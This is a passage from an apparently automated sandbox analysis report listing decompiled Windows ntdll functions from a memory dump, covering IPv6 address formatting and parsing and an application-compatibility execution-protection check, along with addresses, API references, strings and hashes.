							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00C87707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00C87707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00C87707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x00c913d5
0x00c913d9
0x00c913dc
0x00c913de
0x00c913e1
0x00c913e8
0x00c913ee
0x00cbe8fd
0x00000000
0x00cbe921
0x00cbe921
0x00cbe928
0x00cbe982
0x00cbe98a
0x00000000
0x00cbe99a
0x00cbe99e
0x00cbe9a3
0x00cbe9a8
0x00cbe9b9
0x00cbe978
0x00000000
0x00cbe978
0x00cbe98a
0x00cbe92a
0x00cbe931
0x00cbe944
0x00cbe944
0x00cbe950
0x00cbe954
0x00cbe959
0x00cbe95e
0x00cbe963
0x00cbe970
0x00000000
0x00cbe975
0x00cbe93b
0x00cbe980
0x00000000
0x00cbe980
0x00cbe942
0x00cbe94b
0x00000000
0x00cbe94b
0x00000000
0x00cbe942
0x00c913f4
0x00c913f4
0x00c913f9
0x00c913fc
0x00c913ff
0x00c91406
0x00cbe9cc
0x00cbe9d2
0x00cbe9d2
0x00cbe9cc
0x00c9140c
0x00c91411
0x00c91431
0x00c9143a
0x00c9143c
0x00c9143f
0x00c9143f
0x00c91442
0x00c91447
0x00c914a8
0x00c914ac
0x00cbe9e2
0x00cbe9e7
0x00cbe9ec
0x00cbea05
0x00cbea05
0x00000000
0x00c91449
0x00000000
0x00c91449
0x00c9144c
0x00c91459
0x00c91462
0x00c91469
0x00c9146a
0x00c91470
0x00c91473
0x00c91476
0x00c91476
0x00c91490
0x00c91495
0x00c9138e
0x00c91390
0x00c91397
0x00c91398
0x00c91399
0x00c913a1
0x00c913a4
0x00c913a4
0x00c91498
0x00c9149c
0x00c9149f
0x00c914a2
0x00000000
0x00000000
0x00c914a4
0x00000000
0x00c914a4
0x00c91413
0x00c91415
0x00c91416
0x00c91419
0x00c9141c
0x00c91422
0x00c913b7
0x00c913bc
0x00c913bf
0x00c913bf
0x00c913c2
0x00c91424
0x00c91424
0x00c91424
0x00c91427
0x00c9142b
0x00c9142c
0x00c9142c
0x00c9142c
0x00000000
0x00c9141c
0x00c91411

APIs

___swprintf_l.LIBCMT ref: 00C9146B
___swprintf_l.LIBCMT ref: 00C91490
___swprintf_l.LIBCMT ref: 00CBE970

Strings

:%u.%u.%u.%u, xrefs: 00CBE9F4
ffff:, xrefs: 00CBE94B
::%hs%u.%u.%u.%u, xrefs: 00CBE967
::ffff:0:%u.%u.%u.%u, xrefs: 00CBE9B0

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 10617a1710b2d807960967e73edc257a541cada671106607eb109c712eefef58
Instruction ID: dd52e4244b39c7ee55b30df15967e922f0eab13a6c2940c78a526f4f5fcd884a
Opcode Fuzzy Hash: 10617a1710b2d807960967e73edc257a541cada671106607eb109c712eefef58
Instruction Fuzzy Hash: 136126B1D00656AACF25DF5AC8858FEBBB5EF98301B18C16DF8A647640D234AB44DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CF3B8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00CF3B8E(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _t84;
				void* _t87;
				intOrPtr* _t97;
				void* _t104;
				void* _t106;
				void* _t109;
				intOrPtr _t116;
				signed int _t117;
				signed int _t122;
				signed int _t126;
				char _t127;
				signed int _t128;
				intOrPtr* _t133;
				void* _t134;

				_t133 = _a4;
				_t122 = 0;
				_t109 = _a8 + 0x2e;
				_v12 = 8;
				if( *_t133 != 0 ||  *((intOrPtr*)(_t133 + 2)) != 0 ||  *((intOrPtr*)(_t133 + 4)) != 0 ||  *((intOrPtr*)(_t133 + 6)) != 0 ||  *(_t133 + 0xc) == 0) {
					L17:
					_a4 = _t122;
					_v8 = _t122;
					_v16 = _t122;
					if(( *(_t133 + 8) & 0x0000fffd) == 0 &&  *(_t133 + 0xa) == 0xfe5e) {
						_v12 = 6;
					}
					_t127 = _v12;
					if(_t127 <= _t122) {
						L27:
						if(_a4 - _v8 <= 1) {
							_a4 = _t122;
							_v8 = _t122;
						}
						_t128 = 0;
						if(_v12 > _t122) {
							L33:
							L33:
							if(_v8 > _t128 || _t128 >= _a4) {
								if(_t128 != _t122 && _t128 != _a4) {
									_push(0xc59c7e);
									_push(_t109 - _a8);
									_push(_a8);
									_t87 = E00D0894A();
									_t134 = _t134 + 0xc;
									_a8 = _a8 + _t87;
								}
								_t84 = E00D0894A(_a8, _t109 - _a8, 0xc59c7a,  *(_t133 + _t128 * 2) & 0x0000ffff);
								_t134 = _t134 + 0x10;
								_a8 = _a8 + _t84;
							} else {
								_push(0xc59c80);
								_push(_t109 - _a8);
								_push(_a8);
								_a8 = _a8 + E00D0894A();
								_t134 = _t134 + 0xc;
								_t128 = _a4 - 1;
							}
							_t128 = _t128 + 1;
							if(_t128 < _v12) {
								goto L32;
							}
							goto L41;
							L32:
							_t122 = 0;
							goto L33;
						} else {
							L41:
							if(_v12 < 8) {
								_push( *(_t133 + 0xf) & 0x000000ff);
								_push( *(_t133 + 0xe) & 0x000000ff);
								_push( *(_t133 + 0xd) & 0x000000ff);
								_a8 = _a8 + E00D0894A(_a8, _t109 - _a8, ":%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							}
							return _a8;
						}
					} else {
						_t116 = 1;
						_t97 = _t133;
						_v20 = _t127;
						do {
							if( *_t97 != _t122) {
								_v16 = _t116;
							} else {
								if(_t116 - _v16 > _a4 - _v8) {
									_v8 = _v16;
									_a4 = _t116;
								}
								_t122 = 0;
							}
							_t97 = _t97 + 2;
							_t116 = _t116 + 1;
							_t40 =  &_v20;
							 *_t40 = _v20 - 1;
						} while ( *_t40 != 0);
						goto L27;
					}
				} else {
					_t126 =  *(_t133 + 8) & 0x0000ffff;
					if(_t126 != 0) {
						L13:
						if(_t126 != 0xffff ||  *(_t133 + 0xa) != 0) {
							_t122 = 0;
							goto L17;
						} else {
							_push( *(_t133 + 0xf) & 0x000000ff);
							_push( *(_t133 + 0xe) & 0x000000ff);
							_push( *(_t133 + 0xd) & 0x000000ff);
							_t104 = E00D0894A(_a8, _t109 - _a8, "::ffff:0:%u.%u.%u.%u",  *(_t133 + 0xc) & 0x000000ff);
							L12:
							return _t104 + _a8;
						}
					}
					_t117 =  *(_t133 + 0xa) & 0x0000ffff;
					if(_t117 == 0) {
						L9:
						_t106 = 0xc52926;
						L11:
						_push( *(_t133 + 0xf) & 0x000000ff);
						_push( *(_t133 + 0xe) & 0x000000ff);
						_push( *(_t133 + 0xd) & 0x000000ff);
						_push( *(_t133 + 0xc) & 0x000000ff);
						_t104 = E00D0894A(_a8, _t109 - _a8, "::%hs%u.%u.%u.%u", _t106);
						goto L12;
					}
					if(_t117 != 0xffff) {
						goto L13;
					}
					if(_t117 != 0) {
						_t106 = 0xc59cac;
						goto L11;
					}
					goto L9;
				}
			}

0x00cf3b9b
0x00cf3b9e
0x00cf3ba0
0x00cf3ba4
0x00cf3bae
0x00cf3c74
0x00cf3c79
0x00cf3c7c
0x00cf3c7f
0x00cf3c86
0x00cf3c93
0x00cf3c93
0x00cf3c9a
0x00cf3c9f
0x00cf3cd0
0x00cf3cd9
0x00cf3cdb
0x00cf3cde
0x00cf3cde
0x00cf3ce1
0x00cf3ce6
0x00000000
0x00cf3cf1
0x00cf3cf4
0x00cf3d1c
0x00cf3d28
0x00cf3d2d
0x00cf3d2e
0x00cf3d31
0x00cf3d36
0x00cf3d39
0x00cf3d39
0x00cf3d56
0x00cf3d5b
0x00cf3d5e
0x00cf3cfb
0x00cf3d00
0x00cf3d05
0x00cf3d06
0x00cf3d11
0x00cf3d14
0x00cf3d17
0x00cf3d17
0x00cf3d61
0x00cf3d65
0x00000000
0x00000000
0x00000000
0x00cf3cef
0x00cf3cef
0x00000000
0x00cf3ce8
0x00cf3d67
0x00cf3d6b
0x00cf3d74
0x00cf3d79
0x00cf3d7e
0x00cf3d95
0x00cf3d95
0x00000000
0x00cf3d98
0x00cf3ca1
0x00cf3ca3
0x00cf3ca4
0x00cf3ca6
0x00cf3ca9
0x00cf3cac
0x00cf3cea
0x00cf3cae
0x00cf3cbb
0x00cf3cc0
0x00cf3cc3
0x00cf3cc3
0x00cf3cc6
0x00cf3cc6
0x00cf3cc9
0x00cf3cca
0x00cf3ccb
0x00cf3ccb
0x00cf3ccb
0x00000000
0x00cf3ca9
0x00cf3bdc
0x00cf3bdc
0x00cf3be8
0x00cf3c3c
0x00cf3c3f
0x00cf3c72
0x00000000
0x00cf3c48
0x00cf3c4f
0x00cf3c54
0x00cf3c59
0x00cf3c68
0x00cf3c34
0x00000000
0x00cf3c34
0x00cf3c3f
0x00cf3bea
0x00cf3bf1
0x00cf3bff
0x00cf3bff
0x00cf3c0b
0x00cf3c12
0x00cf3c17
0x00cf3c1c
0x00cf3c21
0x00cf3c2c
0x00000000
0x00cf3c31
0x00cf3bf8
0x00000000
0x00000000
0x00cf3bfd
0x00cf3c06
0x00000000
0x00cf3c06
0x00000000
0x00cf3bfd

APIs

___swprintf_l.LIBCMT ref: 00CF3C2C
___swprintf_l.LIBCMT ref: 00CF3C68
___swprintf_l.LIBCMT ref: 00CF3D09
___swprintf_l.LIBCMT ref: 00CF3D31
___swprintf_l.LIBCMT ref: 00CF3D56
___swprintf_l.LIBCMT ref: 00CF3D8D

Strings

ffff:, xrefs: 00CF3C06, 00CF3C22
::%hs%u.%u.%u.%u, xrefs: 00CF3C23
:%u.%u.%u.%u, xrefs: 00CF3D84
::ffff:0:%u.%u.%u.%u, xrefs: 00CF3C5F

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 012f61fbf84abf3a0d2e3b470d29e6790147d6b7a5d6e62dbd732ef07a9c8754
Instruction ID: 6b78405fb5dc01f3e0f69fb05558bebe0503b923ae42c72d46e12f3b8f87cec4
Opcode Fuzzy Hash: 012f61fbf84abf3a0d2e3b470d29e6790147d6b7a5d6e62dbd732ef07a9c8754
Instruction Fuzzy Hash: 3E61D3B690028CBBCF60DF59C8408BE7BF5EF54311B14C66AF9A997141E334EB809B61

Uniqueness

Uniqueness Score: -1.00%

Function 00C87EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00C87EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xd32088; // 0x7590a25b
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(L00C87F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					L00CA3F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					L00C5DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xd34218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					L00CA3F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00C60D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						L00CA3F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00C68375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							L00CA3F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00CCE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					L00CA3F92();
					_t38 = 1;
					L2:
					return E00C5E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}

0x00c87f08
0x00c87f0f
0x00c87f12
0x00c87f1b
0x00c87f31
0x00ca3ead
0x00ca3eb4
0x00000000
0x00000000
0x00ca3eba
0x00ca3ecd
0x00ca3ed2
0x00ca3ee1
0x00ca3ee7
0x00ca3eec
0x00ca3f12
0x00ca3f18
0x00ca3f1a
0x00000000
0x00000000
0x00ca3f20
0x00ca3f26
0x00ca3f28
0x00000000
0x00000000
0x00ca3f2e
0x00ca3f30
0x00000000
0x00000000
0x00ca3f3a
0x00ca3f3b
0x00ca3f53
0x00ca3f64
0x00ca3f69
0x00ca3f6c
0x00ca3f6d
0x00ca3f6f
0x00cae304
0x00cae30f
0x00cae315
0x00cae31e
0x00cae321
0x00cae327
0x00cae329
0x00000000
0x00000000
0x00000000
0x00000000
0x00cae32f
0x00cae32f
0x00cae337
0x00cae33a
0x00cae33b
0x00cae33d
0x00cae33f
0x00cae341
0x00cae341
0x00cae34e
0x00cae353
0x00cae358
0x00cae35d
0x00cae35f
0x00000000
0x00000000
0x00cae365
0x00cae365
0x00cae368
0x00cae36e
0x00000000
0x00000000
0x00cae374
0x00cae32f
0x00ca3f75
0x00ca3f7a
0x00ca3f7c
0x00ca3f7e
0x00ca3f86
0x00c87f39
0x00c87f47
0x00c87f47
0x00c87f37
0x00c87f37
0x00000000

APIs

BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00CA3F12

Strings

CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00CA3F75
CLIENT(ntdll): Processing section info %ws..., xrefs: 00CAE345
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00CAE2FB
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00CA3EC4
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00CA3F4A
ExecuteOptions, xrefs: 00CA3F04
Execute=1, xrefs: 00CA3F5E

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: BaseDataModuleQuery
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 3901378454-484625025
Opcode ID: 935c5a28e0b678ae623ecd1b8fdd55472177f11c3ed0048ed3aca8f4283717ad
Instruction ID: bb366d0e67f46a6292d4df6b142ccd4955836142a5850749f28942051dfdf36f
Opcode Fuzzy Hash: 935c5a28e0b678ae623ecd1b8fdd55472177f11c3ed0048ed3aca8f4283717ad
Instruction Fuzzy Hash: 9F410932A4030D7ADF20EAD4DCC6FDA73BCAB15709F1401A9F605E7091E670DB899BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00C90B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C90B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00C68980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							L00C5DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00C90CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00C90CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00C906BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00C906BA(_t135, _t178) == 0 || E00C90A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00C90CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00C90CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00C906BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00C906BA(_t124, _t142) == 0 || E00C90A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

0x00c90b21
0x00c90b24
0x00c90b27
0x00c90b2a
0x00c90b2d
0x00c90b30
0x00c90b33
0x00c90b36
0x00c90b39
0x00c90b3e
0x00c90c65
0x00c90c68
0x00c90c6a
0x00c90c6f
0x00cbeb42
0x00000000
0x00000000
0x00cbeb48
0x00cbeb48
0x00c90c75
0x00c90c7a
0x00cbeb54
0x00000000
0x00000000
0x00000000
0x00cbeb5a
0x00c90c80
0x00c90c84
0x00cbeb98
0x00000000
0x00000000
0x00cbeba6
0x00c90cb8
0x00c90cba
0x00c90cd3
0x00c90cda
0x00c90ce4
0x00c90ce9
0x00000000
0x00c90cec
0x00c90c8c
0x00cbeb63
0x00000000
0x00000000
0x00cbeb70
0x00cbeb75
0x00cbeb7d
0x00000000
0x00000000
0x00cbeb8c
0x00000000
0x00cbeb8c
0x00c90c96
0x00000000
0x00000000
0x00c90ca2
0x00c90cac
0x00c90cb4
0x00000000
0x00000000
0x00c90b44
0x00c90b47
0x00c90b49
0x00000000
0x00000000
0x00c90b4f
0x00c90b50
0x00000000
0x00000000
0x00c90b56
0x00c90b62
0x00c90b7c
0x00c90bac
0x00c90a0f
0x00cbeaaa
0x00000000
0x00cbeac4
0x00cbeac4
0x00c90bd0
0x00c90bd0
0x00c90bd4
0x00c90bd9
0x00000000
0x00000000
0x00c90bdb
0x00c90be0
0x00cbeb0e
0x00c90a1a
0x00000000
0x00c90a1a
0x00cbeb1a
0x00cbeb1f
0x00cbeb27
0x00000000
0x00000000
0x00cbeb36
0x00000000
0x00cbeb36
0x00c90bea
0x00000000
0x00000000
0x00c90bf6
0x00c90c00
0x00c90c03
0x00c90c0b
0x00000000
0x00c90c0b
0x00cbeaaa
0x00000000
0x00c90a15
0x00c90bb6
0x00000000
0x00c90bc6
0x00c90bc6
0x00c90bcb
0x00c90c15
0x00000000
0x00000000
0x00c90c1d
0x00c90c20
0x00c90c21
0x00c90c24
0x00c90c24
0x00c90c26
0x00000000
0x00c90c26
0x00c90bcd
0x00000000
0x00c90bcd
0x00c90b89
0x00c90b89
0x00c90b90
0x00000000
0x00000000
0x00c90b96
0x00000000
0x00c90b96
0x00c90a04
0x00c90a04
0x00c90b9a
0x00c90b9a
0x00c90b9b
0x00c90b9f
0x00000000
0x00000000
0x00000000
0x00c90ba5
0x00c90ac7
0x00c90aca
0x00cbeacf
0x00000000
0x00cbeade
0x00cbeade
0x00cbeae3
0x00000000
0x00000000
0x00cbeaf3
0x00cbeaf6
0x00cbeaf7
0x00cbeafe
0x00cbeb01
0x00000000
0x00cbeb01
0x00cbeacf
0x00c90ad0
0x00c90ad4
0x00000000
0x00000000
0x00c90ada
0x00c90ae6
0x00c90c34
0x00000000
0x00c90c47
0x00c90c49
0x00c90c4a
0x00c90c4e
0x00c90c51
0x00c90c54
0x00c90c57
0x00c90c5a
0x00000000
0x00000000
0x00000000
0x00c90c60
0x00c90afb
0x00c90afe
0x00c90b02
0x00c90b05
0x00c90b08
0x00000000
0x00c90b08
0x00c90ae6
0x00c90b44
0x00c909f8
0x00c909f8
0x00c909f9
0x00000000
0x00000000
0x00cbeaa0
0x00000000

APIs

__fassign.LIBCMT ref: 00C90BF6
__fassign.LIBCMT ref: 00C90CA2

Strings

., xrefs: 00C90A0C
:, xrefs: 00C90AC7
:, xrefs: 00C90BA9

Memory Dump Source

Source File: 00000009.00000002.495469291.0000000000C40000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: true

Associated: 00000009.00000002.495464814.0000000000C30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495575739.0000000000D20000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495580955.0000000000D30000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495586053.0000000000D34000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495590614.0000000000D37000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495594769.0000000000D40000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.495635895.0000000000DA0000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID: .$:$:
API String ID: 3965848254-2308638275
Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction ID: e6bd51c700a303c33195f0c3ef0ea221edfbb2758b99d9bdd27856e5f66462f5
Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
Instruction Fuzzy Hash: 0EA19D7190430AEFCF24CF64C84D6BEB7B5AF05305F34856AE862A7242DB309B41DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00C90554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00C90554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
